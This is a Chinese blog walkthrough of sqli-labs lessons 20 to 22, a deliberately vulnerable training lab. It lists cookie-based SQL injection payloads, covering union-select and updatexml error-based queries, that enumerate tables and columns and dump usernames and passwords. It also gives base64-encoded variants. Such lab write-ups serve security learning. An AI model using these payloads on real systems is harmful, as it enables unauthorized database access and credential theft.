sqli-labs Less20-Less22

Posted 骑着七彩祥云的少年

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs Less20-Less22相关的知识,希望对你有一定的参考价值。

Less-20

登陆成功后,出现cookie,登陆失败会显示失败信息

登陆成功后,后台将usename放入cookie中,再次登陆时候只要是cookie没过期,就会去cookie里面取值,然后进行查询

 

 

可以使用chrom里面的cookie-editer,使用burpsuite抓包

方法一union联合查询:
Cookie: uname=admi’ order by 3#

 

 当order by x后为3时,不报错,当x为4时,报错,说明栏位为3

查库  Cookie: uname=admi’ union select 1,2,database()#

 

 查表 Cookie: uname=\'union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=\'security\'#

 

 查列  uname=adm\' union select 1,2,group_concat(column_name)from information_schema.columns where table_name=\'users\'#

 

 查字段  uname=adm\' union select 1,2,group_concat(concat_ws(\'-\',username,password))from security.users#

 

 

 方法二,报错型注入

查库  Cookie: uname=adm\' or updatexml(1,concat(0x7e,database(),0x7e),1)#

 

 

查表  Cookie: uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=\'security\'),0x7e),1)#
查列  Cookie: uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=\'users\' #
查字段  Cookie:uname=adm\' or updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password) from users),0x7e),1)#

 

Less-21

 

输入密码登陆后,可以看到cookie: uname被加密

 

 百度搜索Base64就可以解决,推荐网址https://base64.us/

 

 查表 uname=\')union select 1,2,database()#

 

 

 

 除了多了一步编码,其他步骤均与第20关类似

 

Less-22

通过编码测试发现,这一关的包裹是双引号

uname="union select 1,2,database()#

解码为InVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=

其他步骤均与第21关相同

 

以上是关于sqli-labs Less20-Less22的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS 靶场通关小记(1~22)

SQLI-LABS 靶场通关小记(1~22)

小白注入学习:sqli-labs--less8学习记录

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)